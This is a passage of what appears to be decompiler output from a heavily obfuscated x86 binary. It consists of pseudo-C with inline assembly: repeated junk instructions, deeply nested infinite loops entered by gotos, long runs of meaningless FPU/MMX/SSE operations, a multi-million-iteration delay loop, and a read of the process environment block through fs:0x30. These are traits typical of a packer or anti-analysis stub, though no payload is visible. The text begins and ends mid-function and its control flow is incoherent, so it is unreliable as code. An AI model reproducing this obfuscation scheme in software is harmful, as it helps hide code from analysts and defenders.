				asm("adc [ebp-0x8], ch");
				asm("lodsd");
				gs = _t553;
				asm("lodsd");
				gs = _t553;
				asm("lodsd");
				gs = _t553;
				asm("lodsd");
				gs = _t553;
				asm("lodsd");
				gs = _t553;
				asm("lodsd");
				gs = _t553;
				asm("lodsd");
				gs = _t553;
				asm("lodsd");
				gs = _t553;
				asm("lodsd");
				gs = _t553;
				asm("lodsd");
				gs = _t553;
				while(1) {
					L1:
					asm("in eax, dx");
					asm("lodsd");
					gs = _t553;
					while(1) {
						asm("in eax, dx");
						asm("lodsd");
						gs = _t553;
						while(1) {
							L3:
							asm("in eax, dx");
							asm("lodsd");
							gs = _t553;
							while(1) {
								L4:
								asm("in eax, dx");
								asm("lodsd");
								gs = _t553;
								while(1) {
									L5:
									asm("in eax, dx");
									asm("lodsd");
									gs = _t553;
									while(1) {
										L6:
										asm("in eax, dx");
										asm("lodsd");
										gs = _t553;
										while(1) {
											L7:
											asm("in eax, dx");
											asm("lodsd");
											gs = _t553;
											while(1) {
												L8:
												asm("in eax, dx");
												asm("lodsd");
												gs = _t553;
												while(1) {
													L9:
													asm("in eax, dx");
													asm("lodsd");
													gs = _t553;
													while(1) {
														L10:
														asm("in eax, dx");
														asm("lodsd");
														gs = _t553;
														while(1) {
															L11:
															asm("in eax, dx");
															asm("lodsd");
															gs = _t553;
															while(1) {
																L12:
																asm("in eax, dx");
																asm("lodsd");
																gs = _t553;
																while(1) {
																	L13:
																	asm("in eax, dx");
																	asm("pushfd");
																	 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																	while(1) {
																		L14:
																		_t232 = _t231 ^ 0x0000009c;
																		 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																		while(1) {
																			L15:
																			_t233 = _t232 ^ 0x0000009c;
																			 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																			while(1) {
																				L16:
																				_t234 = _t233 ^ 0x0000009c;
																				 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																				while(1) {
																					L17:
																					_t235 = _t234 ^ 0x0000009c;
																					 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																					while(1) {
																						L18:
																						_t236 = _t235 ^ 0x0000009c;
																						 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																						while(1) {
																							L19:
																							_t237 = _t236 ^ 0x0000009c;
																							 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																							while(1) {
																								L20:
																								_t238 = _t237 ^ 0x0000009c;
																								 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																								while(1) {
																									L21:
																									_t239 = _t238 ^ 0x0000009c;
																									 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																									while(1) {
																										L22:
																										_t240 = _t239 ^ 0x0000009c;
																										 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																										while(1) {
																											L23:
																											_t241 = _t240 ^ 0x0000009c;
																											 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																											while(1) {
																												L24:
																												_t242 = _t241 ^ 0x0000009c;
																												 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																												while(1) {
																													L25:
																													_t231 = _t242 ^ 0x0000009c;
																													 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																													 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																													 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																													 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																													 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																													 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																													 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																													 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																													 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																													 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																													 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																													 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																													 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																													 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																													_t105 = _t485 + _t418 * 4;
																													 *_t105 =  *((intOrPtr*)(_t485 + _t418 * 4)) + _t418;
																													_t607 =  *_t105;
																													if(_t607 > 0) {
																														goto L1;
																													}
																													_t109 = _t231;
																													_t231 = _t485;
																													_t485 = _t109;
																													if(_t607 > 0) {
																														asm("in eax, dx");
																														asm("lodsd");
																														gs = _t553;
																														L3:
																														asm("in eax, dx");
																														asm("lodsd");
																														gs = _t553;
																														L4:
																														asm("in eax, dx");
																														asm("lodsd");
																														gs = _t553;
																														L5:
																														asm("in eax, dx");
																														asm("lodsd");
																														gs = _t553;
																														L6:
																														asm("in eax, dx");
																														asm("lodsd");
																														gs = _t553;
																														L7:
																														asm("in eax, dx");
																														asm("lodsd");
																														gs = _t553;
																														L8:
																														asm("in eax, dx");
																														asm("lodsd");
																														gs = _t553;
																														L9:
																														asm("in eax, dx");
																														asm("lodsd");
																														gs = _t553;
																														L10:
																														asm("in eax, dx");
																														asm("lodsd");
																														gs = _t553;
																														L11:
																														asm("in eax, dx");
																														asm("lodsd");
																														gs = _t553;
																														L12:
																														asm("in eax, dx");
																														asm("lodsd");
																														gs = _t553;
																														L13:
																														asm("in eax, dx");
																														asm("pushfd");
																														 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																														L14:
																														_t232 = _t231 ^ 0x0000009c;
																														 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																														L15:
																														_t233 = _t232 ^ 0x0000009c;
																														 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																														L16:
																														_t234 = _t233 ^ 0x0000009c;
																														 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																														L17:
																														_t235 = _t234 ^ 0x0000009c;
																														 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																														L18:
																														_t236 = _t235 ^ 0x0000009c;
																														 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																														L19:
																														_t237 = _t236 ^ 0x0000009c;
																														 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																														L20:
																														_t238 = _t237 ^ 0x0000009c;
																														 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																														L21:
																														_t239 = _t238 ^ 0x0000009c;
																														 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																														L22:
																														_t240 = _t239 ^ 0x0000009c;
																														 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																														L23:
																														_t241 = _t240 ^ 0x0000009c;
																														 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																														L24:
																														_t242 = _t241 ^ 0x0000009c;
																														 *((intOrPtr*)(_t569 + _t304 * 4)) =  *((intOrPtr*)(_t569 + _t304 * 4)) + _t418;
																														continue;
																													}
																													_t110 = _t231;
																													_t231 = _t485;
																													_t485 = _t110;
																													if(_t607 > 0) {
																														goto L3;
																													}
																													_t111 = _t231;
																													_t231 = _t485;
																													_t485 = _t111;
																													if(_t607 > 0) {
																														goto L4;
																													}
																													_t112 = _t231;
																													_t231 = _t485;
																													_t485 = _t112;
																													if(_t607 > 0) {
																														goto L5;
																													}
																													_t113 = _t231;
																													_t231 = _t485;
																													_t485 = _t113;
																													if(_t607 > 0) {
																														goto L6;
																													}
																													_t114 = _t231;
																													_t231 = _t485;
																													_t485 = _t114;
																													if(_t607 > 0) {
																														goto L7;
																													}
																													_t115 = _t231;
																													_t231 = _t485;
																													_t485 = _t115;
																													if(_t607 > 0) {
																														goto L8;
																													}
																													_t116 = _t231;
																													_t231 = _t485;
																													_t485 = _t116;
																													if(_t607 > 0) {
																														goto L9;
																													}
																													_t117 = _t231;
																													_t231 = _t485;
																													_t485 = _t117;
																													if(_t607 > 0) {
																														goto L10;
																													}
																													_t118 = _t231;
																													_t231 = _t485;
																													_t485 = _t118;
																													if(_t607 > 0) {
																														goto L11;
																													}
																													_t119 = _t231;
																													_t231 = _t485;
																													_t485 = _t119;
																													if(_t607 > 0) {
																														goto L12;
																													}
																													_t120 = _t231;
																													_t231 = _t485;
																													_t485 = _t120;
																													if(_t607 > 0) {
																														goto L13;
																													}
																													_t121 = _t231;
																													_t231 = _t485;
																													_t485 = _t121;
																													if(_t607 > 0) {
																														goto L14;
																													}
																													_t232 = _t485;
																													_t485 = _t231;
																													if(_t607 > 0) {
																														goto L15;
																													}
																													_t233 = _t485;
																													_t485 = _t232;
																													if(_t607 > 0) {
																														goto L16;
																													}
																													_t234 = _t485;
																													_t485 = _t233;
																													if(_t607 > 0) {
																														goto L17;
																													}
																													_t235 = _t485;
																													_t485 = _t234;
																													if(_t607 > 0) {
																														goto L18;
																													}
																													_t236 = _t485;
																													_t485 = _t235;
																													if(_t607 > 0) {
																														goto L19;
																													}
																													_t237 = _t485;
																													_t485 = _t236;
																													if(_t607 > 0) {
																														goto L20;
																													}
																													_t238 = _t485;
																													_t485 = _t237;
																													if(_t607 > 0) {
																														goto L21;
																													}
																													_t239 = _t485;
																													_t485 = _t238;
																													if(_t607 > 0) {
																														goto L22;
																													}
																													_t240 = _t485;
																													_t485 = _t239;
																													if(_t607 > 0) {
																														goto L23;
																													}
																													_t241 = _t485;
																													_t485 = _t240;
																													if(_t607 > 0) {
																														goto L24;
																													}
																													_t242 = _t485;
																													_t485 = _t241;
																													if(_t607 > 0) {
																														continue;
																													}
																													asm("in al, 0x4f");
																													_t510 = _t485 - 0xffffffffffffffe9;
																													_t243 = _t242 -  *(_t379 + 0x6f81206f);
																													 *(_t379 + 0x6f81206f) =  *(_t379 + 0x6f81206f) & _t243;
																													 *(_t379 + 0x6f81206f) =  *(_t379 + 0x6f81206f) & _t243;
																													 *(_t379 + 0x6f81206f) =  *(_t379 + 0x6f81206f) & _t243;
																													 *(_t379 + 0x6f81206f) =  *(_t379 + 0x6f81206f) & _t243;
																													 *(_t379 + 0x6f81206f) =  *(_t379 + 0x6f81206f) & _t243;
																													 *(_t379 + 0x6f81206f) =  *(_t379 + 0x6f81206f) & _t243;
																													 *(_t379 + 0x6f81206f) =  *(_t379 + 0x6f81206f) & _t243;
																													 *(_t379 + 0x6f81206f) =  *(_t379 + 0x6f81206f) & _t243;
																													 *(_t379 + 0x6f81206f) =  *(_t379 + 0x6f81206f) & _t243;
																													 *(_t379 + 0x6f81206f) =  *(_t379 + 0x6f81206f) & _t243;
																													 *(_t379 + 0x6f81206f) =  *(_t379 + 0x6f81206f) & _t243;
																													 *(_t379 + 0x6f81206f) =  *(_t379 + 0x6f81206f) & _t243;
																													 *(_t379 + 0x6f81206f) =  *(_t379 + 0x6f81206f) & _t243;
																													 *(_t243 - 0x1f) =  *(_t243 - 0x1f) & _t418;
																													asm("o16 jo 0xffe4");
																													asm("o16 jo 0xffe4");
																													asm("o16 jo 0xffe4");
																													asm("o16 jo 0xffe4");
																													asm("o16 jo 0xffe4");
																													asm("o16 jo 0xffe4");
																													asm("o16 jo 0xffe4");
																													asm("o16 jo 0xffe4");
																													asm("o16 jo 0xffe4");
																													asm("o16 jo 0xffe4");
																													asm("o16 jo 0xffe4");
																													asm("o16 jo 0xffe4");
																													asm("o16 jo 0xffe4");
																													asm("o16 jo 0xffe4");
																													asm("o16 jo 0xffe4");
																													asm("o16 jo 0xffe4");
																													asm("o16 jo 0xffe4");
																													asm("o16 jo 0xffe4");
																													asm("o16 jo 0xffe4");
																													asm("o16 jo 0xffe4");
																													asm("o16 jo 0xffe4");
																													asm("o16 sub [eax+0x75], ah");
																													 *((intOrPtr*)(_t243 + 0x75)) =  *((intOrPtr*)(_t243 + 0x75)) - _t243;
																													 *((intOrPtr*)(_t243 + 0x75)) =  *((intOrPtr*)(_t243 + 0x75)) - _t243;
																													 *((intOrPtr*)(_t243 + 0x75)) =  *((intOrPtr*)(_t243 + 0x75)) - _t243;
																													 *((intOrPtr*)(_t243 + 0x75)) =  *((intOrPtr*)(_t243 + 0x75)) - _t243;
																													 *((intOrPtr*)(_t243 + 0x75)) =  *((intOrPtr*)(_t243 + 0x75)) - _t243;
																													 *((intOrPtr*)(_t243 + 0x75)) =  *((intOrPtr*)(_t243 + 0x75)) - _t243;
																													 *((intOrPtr*)(_t243 + 0x75)) =  *((intOrPtr*)(_t243 + 0x75)) - _t243;
																													 *((intOrPtr*)(_t243 + 0x75)) =  *((intOrPtr*)(_t243 + 0x75)) - _t243;
																													 *((intOrPtr*)(_t243 + 0x75)) =  *((intOrPtr*)(_t243 + 0x75)) - _t243;
																													 *((intOrPtr*)(_t243 + 0x75)) =  *((intOrPtr*)(_t243 + 0x75)) - _t243;
																													 *((intOrPtr*)(_t243 + 0x75)) =  *((intOrPtr*)(_t243 + 0x75)) - _t243;
																													 *((intOrPtr*)(_t243 + 0x75)) =  *((intOrPtr*)(_t243 + 0x75)) - _t243;
																													 *((intOrPtr*)(_t243 + 0x75)) =  *((intOrPtr*)(_t243 + 0x75)) - _t243;
																													 *((intOrPtr*)(_t243 + 0x75)) =  *((intOrPtr*)(_t243 + 0x75)) - _t243;
																													 *((intOrPtr*)(_t243 + 0x75)) =  *((intOrPtr*)(_t243 + 0x75)) - _t243;
																													 *((intOrPtr*)(_t243 + 0x75)) =  *((intOrPtr*)(_t243 + 0x75)) - _t243;
																													 *((intOrPtr*)(_t243 + 0x75)) =  *((intOrPtr*)(_t243 + 0x75)) - _t243;
																													 *((intOrPtr*)(_t243 + 0x75)) =  *((intOrPtr*)(_t243 + 0x75)) - _t243;
																													 *((intOrPtr*)(_t243 + 0x75)) =  *((intOrPtr*)(_t243 + 0x75)) - _t243;
																													 *((intOrPtr*)(_t243 + 0x75)) =  *((intOrPtr*)(_t243 + 0x75)) - _t243;
																													 *((intOrPtr*)(_t243 + 0x75)) =  *((intOrPtr*)(_t243 + 0x75)) - _t243;
																													 *((intOrPtr*)(_t243 + 0x75)) =  *((intOrPtr*)(_t243 + 0x75)) - _t243;
																													 *((intOrPtr*)(_t243 + 0x75)) =  *((intOrPtr*)(_t243 + 0x75)) - _t243;
																													 *((intOrPtr*)(_t243 + 0x75)) =  *((intOrPtr*)(_t243 + 0x75)) - _t243;
																													 *((intOrPtr*)(_t243 + 0x75)) =  *((intOrPtr*)(_t243 + 0x75)) - _t243;
																													_t212 = _t243 + 0x75;
																													 *_t212 =  *((intOrPtr*)(_t243 + 0x75)) - _t243;
																													_t608 =  *_t212;
																													if(_t608 == 0) {
																														L67:
																														_pop(_t554);
																														if(_t608 == 0) {
																															goto L84;
																														} else {
																															goto L68;
																														}
																													} else {
																														if(_t608 == 0) {
																															L68:
																															_pop(_t554);
																															if(_t608 == 0) {
																																goto L85;
																															} else {
																																goto L69;
																															}
																														} else {
																															if(_t608 == 0) {
																																L69:
																																_pop(_t554);
																																if(_t608 == 0) {
																																	goto L86;
																																} else {
																																	goto L70;
																																}
																															} else {
																																if(_t608 == 0) {
																																	L70:
																																	_pop(_t554);
																																	if(_t608 == 0) {
																																		goto L87;
																																	} else {
																																		goto L71;
																																	}
																																} else {
																																	if(_t608 == 0) {
																																		L71:
																																		_pop(_t554);
																																		if(_t608 == 0) {
																																			goto L88;
																																		} else {
																																			goto L72;
																																		}
																																	} else {
																																		if(_t608 == 0) {
																																			L72:
																																			_pop(_t554);
																																			if(_t608 == 0) {
																																				goto L89;
																																			} else {
																																				goto L73;
																																			}
																																		} else {
																																			if(_t608 == 0) {
																																				L73:
																																				_pop(_t554);
																																				if(_t608 == 0) {
																																					goto L90;
																																				} else {
																																					goto L74;
																																				}
																																			} else {
																																				if(_t608 == 0) {
																																					L74:
																																					_pop(_t554);
																																					if(_t608 == 0) {
																																						goto L91;
																																					} else {
																																						goto L75;
																																					}
																																				} else {
																																					if(_t608 == 0) {
																																						L75:
																																						_pop(_t554);
																																						if(_t608 == 0) {
																																							goto L92;
																																						} else {
																																							goto L76;
																																						}
																																					} else {
																																						if(_t608 == 0) {
																																							L76:
																																							_pop(_t555);
																																							if(_t608 == 0) {
																																								goto L93;
																																							} else {
																																								goto L77;
																																							}
																																						} else {
																																							if(_t608 == 0) {
																																								L77:
																																								if(_t608 == 0) {
																																									goto L94;
																																								} else {
																																									goto L78;
																																								}
																																							} else {
																																								if(_t608 == 0) {
																																									L78:
																																									_pop(_t555);
																																									if(_t608 != 0) {
																																										goto L79;
																																									}
																																								} else {
																																									if(_t608 == 0) {
																																										L79:
																																										_pop(_t554);
																																										asm("adc dl, [ecx+0x52]");
																																										goto L80;
																																									} else {
																																										_pop(_t554);
																																										if(_t608 == 0) {
																																											L80:
																																											_push(_t418);
																																											asm("adc dl, [ecx+0x52]");
																																											goto L81;
																																										} else {
																																											_pop(_t554);
																																											if(_t608 == 0) {
																																												L81:
																																												_push(_t418);
																																												asm("adc dl, [ecx+0x52]");
																																												goto L82;
																																											} else {
																																												_pop(_t554);
																																												if(_t608 == 0) {
																																													L82:
																																													_push(_t418);
																																													asm("adc dl, [ecx+0x52]");
																																													goto L83;
																																												} else {
																																													_pop(_t554);
																																													if(_t608 == 0) {
																																														L83:
																																														_push(_t418);
																																														asm("adc dl, [ecx+0x52]");
																																														L84:
																																														_push(_t418);
																																														asm("adc dl, [ecx+0x52]");
																																														L85:
																																														_push(_t418);
																																														asm("adc dl, [ecx+0x52]");
																																														L86:
																																														_push(_t418);
																																														asm("adc dl, [ecx+0x52]");
																																														L87:
																																														_push(_t418);
																																														asm("adc dl, [ecx+0x52]");
																																														L88:
																																														_push(_t418);
																																														asm("adc dl, [ecx+0x52]");
																																														L89:
																																														_push(_t418);
																																														asm("adc dl, [ecx+0x52]");
																																														L90:
																																														_push(_t418);
																																														asm("adc dl, [ecx+0x52]");
																																														L91:
																																														_push(_t418);
																																														 *((intOrPtr*)(_t243 + 0x2b)) =  *((intOrPtr*)(_t243 + 0x2b)) - _t418;
																																														L92:
																																														_t555 = _t554 -  *((intOrPtr*)(_t552 - 0x77));
																																														L93:
																																														 *((intOrPtr*)(_t379 - 0x24766f37)) =  *((intOrPtr*)(_t379 - 0x24766f37)) - 1;
																																														L94:
																																													} else {
																																														goto L67;
																																													}
																																												}
																																											}
																																										}
																																									}
																																								}
																																							}
																																						}
																																					}
																																				}
																																			}
																																		}
																																	}
																																}
																															}
																														}
																													}
																													asm("fnop");
																													asm("fnop");
																													_t422 = _t418;
																													asm("fnop");
																													_t305 = _t304;
																													asm("psrld mm4, 0xee");
																													asm("psrad mm3, mm3");
																													asm("paddw mm1, mm1");
																													asm("emms");
																													asm("punpckhdq mm1, mm7");
																													asm("pmullw mm1, mm0");
																													asm("fnop");
																													_t246 = _t243;
																													_t307 = _t305;
																													asm("fnop");
																													_t423 = _t422;
																													asm("fxtract");
																													asm("fclex");
																													asm("psubsw xmm3, xmm0");
																													asm("fdivr st1, st0");
																													asm("punpckhwd mm6, mm5");
																													asm("paddusw mm3, mm2");
																													asm("wait");
																													asm("fldl2t");
																													asm("pcmpgtb mm7, mm2");
																													asm("fnop");
																													asm("fnop");
																													_t308 = _t307;
																													_t427 = _t423;
																													asm("fnop");
																													_t247 = _t246;
																													asm("faddp st7, st0");
																													asm("paddd xmm1, xmm2");
																													asm("movd xmm1, esp");
																													asm("ffree st1");
																													_t249 = _t247;
																													asm("fnop");
																													_t511 = _t510;
																													asm("fnop");
																													_t428 = _t427;
																													asm("fnop");
																													asm("fsqrt");
																													asm("ffree st1");
																													_t310 = _t308;
																													asm("fyl2xp1");
																													asm("pmulhw xmm6, xmm6");
																													asm("psubw xmm5, xmm0");
																													asm("psllw mm1, 0x48");
																													asm("fnop");
																													_t396 = 0;
																													_t431 = _t428;
																													do {
																														asm("emms");
																														_t311 = _t310;
																														_t399 = _t396 + 1;
																														asm("fabs");
																														asm("fsincos");
																														asm("pmaddwd mm5, mm6");
																														asm("fsubr st2, st0");
																														asm("punpckhdq xmm4, xmm0");
																														asm("fprem");
																														asm("packuswb xmm2, xmm7");
																														_t396 = _t399;
																														asm("lfence");
																														asm("fnop");
																														_t310 = _t311;
																													} while (_t396 != 0x1ffffa);
																													asm("fnop");
																													_t313 =  *[fs:0x30];
																													asm("paddusb mm1, mm0");
																													asm("psubusb mm7, mm1");
																													asm("psrld mm4, 0xee");
																													asm("psrad mm3, mm3");
																													asm("paddw mm1, mm1");
																													asm("emms");
																													asm("punpckhdq mm1, mm7");
																													asm("pmullw mm1, mm0");
																													asm("fdecstp");
																													asm("wait");
																													asm("fnop");
																													_t318 =  *((intOrPtr*)(_t313 + 8));
																													_t513 = _t511;
																													_t320 = _t318;
																													_t402 =  *_t318;
																													asm("fxtract");
																													asm("packssdw xmm4, xmm1");
																													asm("fpatan");
																													asm("fsincos");
																													asm("pand mm3, mm1");
																													asm("paddd mm7, mm4");
																													asm("fld1");
																													asm("fsubrp st1, st0");
																													asm("psrlq xmm5, 0xe0");
																													asm("fnop");
																													asm("fnop");
																													0;
																													asm("fnop");
																													_t404 = _t402;
																													_t322 = _t320;
																													asm("fdivp st5, st0");
																													asm("psllw mm2, 0x34");
																													asm("fdecstp");
																													asm("fchs");
																													asm("fnop");
																													asm("fcos");
																													asm("pslld xmm0, 0x3f");
																													asm("fnop");
																													asm("fnop");
																													_t405 = _t404;
																													asm("fnop");
																													_t514 = _t513;
																													asm("fnop");
																													_t325 = _t322;
																													asm("fxch st0, st1");
																													asm("psllw mm1, 0xf4");
																													asm("packsswb xmm5, xmm6");
																													asm("fsincos");
																													asm("wait");
																													asm("fninit");
																													asm("pandn mm2, mm4");
																													asm("fnop");
																													_t326 = _t325;
																													asm("fnop");
																													asm("fnop");
																													asm("fnop");
																													asm("fninit");
																													asm("pmulhw xmm1, xmm4");
																													asm("fldz");
																													asm("paddb xmm5, xmm5");
																													asm("pand xmm6, xmm3");
																													asm("fchs");
																													asm("fxch st0, st1");
																													asm("fdecstp");
																													asm("lfence");
																													_t406 = _t405;
																													asm("fnop");
																													asm("fnop");
																													asm("fnop");
																													asm("fnop");
																													asm("fnop");
																													_t328 = _t326;
																													0;
																													asm("punpckldq mm2, mm4");
																													asm("pand mm0, mm0");
																													asm("frndint");
																													asm("fyl2xp1");
																													asm("fldl2e");
																													asm("fninit");
																													asm("fldl2e");
																													asm("fnop");
																													_t407 = _t406;
																													asm("fnop");
																													_t331 =  *((intOrPtr*)(_t328 + 0xffffeb73));
																													asm("fnop");
																													do {
																														asm("paddd mm7, mm4");
																														asm("fld1");
																														asm("fsubrp st1, st0");
																														asm("psrlq xmm5, 0xe0");
																														asm("psrad xmm1, xmm2");
																														asm("f2xm1");
																														asm("paddusb xmm7, xmm1");
																														_t331 = _t331 - 1;
																														asm("fnop");
																														asm("fnop");
																														_t613 =  *_t331 - _t407;
																													} while (_t613 != 0);
																													asm("fnop");
																													asm("fnop");
																													asm("fnop");
																													_t335 = _t331;
																													asm("fchs");
																													asm("fnop");
																													asm("fcos");
																													asm("pslld xmm0, 0x3f");
																													asm("fmulp st2, st0");
																													asm("psrad mm0, mm1");
																													asm("wait");
																													_t516 = _t514;
																													_t336 = _t335;
																													asm("psllw mm1, 0xf4");
																													asm("packsswb xmm5, xmm6");
																													asm("fsincos");
																													asm("wait");
																													asm("fninit");
																													asm("pandn mm2, mm4");
																													asm("fprem1");
																													asm("wait");
																													asm("fldl2t");
																													asm("paddw mm4, mm5");
																													_t518 = _t516;
																													_t337 = _t336;
																													asm("fnop");
																													asm("pand xmm6, xmm3");
																													asm("fchs");
																													asm("fxch st0, st1");
																													asm("fdecstp");
																													asm("lfence");
																													asm("psubsw mm6, mm6");
																													asm("psubusb xmm2, xmm2");
																													asm("fnop");
																													asm("fnop");
																													_t519 = _t518;
																													asm("pand mm0, mm0");
																													asm("frndint");
																													asm("fyl2xp1");
																													asm("fldl2e");
																													asm("fninit");
																													asm("fldl2e");
																													asm("punpckhdq xmm0, xmm7");
																													asm("fnop");
																													_t338 = _t337;
																													asm("fnop");
																													asm("fnop");
																													_t520 = _t519;
																													asm("fnop");
																													asm("fnop");
																													asm("fnop");
																													asm("fnop");
																													asm("fld1");
																													asm("fsubrp st1, st0");
																													asm("psrlq xmm5, 0xe0");
																													asm("psrad xmm1, xmm2");
																													asm("f2xm1");
																													asm("paddusb xmm7, xmm1");
																													asm("psraw xmm0, xmm6");
																													asm("fyl2x");
																													asm("fnop");
																													asm("fnop");
																													asm("fnop");
																													_t523 = _t520;
																													_t412 =  *((intOrPtr*)(_t338 + 0x655d));
																													asm("fnop");
																													asm("fcos");
																													asm("pslld xmm0, 0x3f");
																													asm("fmulp st2, st0");
																													asm("psrad mm0, mm1");
																													asm("wait");
																													asm("fxtract");
																													asm("pxor mm5, mm0");
																													asm("punpckldq xmm5, xmm5");
																													_t413 = _t412;
																													asm("fnop");
																													asm("fnop");
																													_t525 = _t523;
																													asm("fsincos");
																													asm("wait");
																													asm("fninit");
																													asm("pandn mm2, mm4");
																													asm("fprem1");
																													asm("wait");
																													asm("fldl2t");
																													asm("fnop");
																													asm("fnop");
																													asm("fnop");
																													_t526 = _t525;
																													asm("fnop");
																													asm("fnop");
																													asm("paddb xmm5, xmm5");
																													asm("pand xmm6, xmm3");
																													asm("fchs");
																													asm("fxch st0, st1");
																													asm("fdecstp");
																													asm("lfence");
																													asm("fnop");
																													asm("fnop");
																													asm("fnop");
																													_t529 = _t526;
																													asm("fnop");
																													asm("fnop");
																													asm("fnop");
																													asm("punpckldq mm2, mm4");
																													asm("pand mm0, mm0");
																													asm("frndint");
																													asm("fyl2xp1");
																													asm("fldl2e");
																													asm("fninit");
																													asm("fldl2e");
																													asm("fnop");
																													asm("fnop");
																													_t414 = _t413;
																													_t530 = _t529;
																													asm("fnop");
																													asm("fnop");
																													asm("fnop");
																													asm("fnop");
																													asm("paddd mm7, mm4");
																													asm("fld1");
																													asm("fsubrp st1, st0");
																													asm("psrlq xmm5, 0xe0");
																													asm("psrad xmm1, xmm2");
																													asm("f2xm1");
																													asm("paddusb xmm7, xmm1");
																													asm("fnop");
																													_t532 = _t530;
																													asm("fnop");
																													_push(0x40);
																													asm("fnop");
																													asm("fchs");
																													asm("fnop");
																													asm("fcos");
																													asm("pslld xmm0, 0x3f");
																													asm("fmulp st2, st0");
																													asm("psrad mm0, mm1");
																													asm("wait");
																													asm("fnop");
																													asm("fnop");
																													asm("fnop");
																													asm("fnop");
																													0;
																													asm("fnop");
																													_t535 = _t532;
																													asm("psllw mm1, 0xf4");
																													asm("packsswb xmm5, xmm6");
																													asm("fsincos");
																													asm("wait");
																													asm("fninit");
																													asm("pandn mm2, mm5");
																													asm("ftst");
																													asm("pause");
																													asm("fpatan");
																													asm("psubw mm5, mm5");
																													asm("fnop");
																													asm("fnop");
																													asm("fnop");
																													asm("fnop");
																													asm("fnop");
																													asm("fmulp st1, st0");
																													asm("fld1");
																													asm("wait");
																													asm("fldz");
																													asm("wait");
																													asm("fclex");
																													_t415 = _t414;
																													asm("paddw mm7, mm6");
																													asm("pmaddwd xmm2, xmm3");
																													asm("punpckhbw mm0, mm1");
																													asm("fnop");
																													asm("fnop");
																													asm("fnop");
																													_t537 = _t535;
																													asm("fnop");
																													asm("fnop");
																													asm("fnop");
																													asm("fnop");
																													asm("f2xm1");
																													asm("mfence");
																													asm("fclex");
																													asm("fsincos");
																													asm("fninit");
																													asm("paddusw xmm0, xmm7");
																													asm("fnop");
																													asm("fnop");
																													_t538 = _t537;
																													asm("fnop");
																													asm("fnop");
																													_push(0xfffff785);
																													asm("fnop");
																													asm("fnop");
																													asm("fldz");
																													asm("fcos");
																													while(1) {
																														 *_t538 =  *_t538 - 1;
																														asm("fcmovnbe st0, st6");
																														asm("pandn xmm2, xmm3");
																														goto L127;
																														if (_t613 < 0) goto L126;
																														asm("repne dec esi");
																													}
																												}
																												goto L1;
																											}
																										}
																									}
																								}
																							}
																						}
																					}
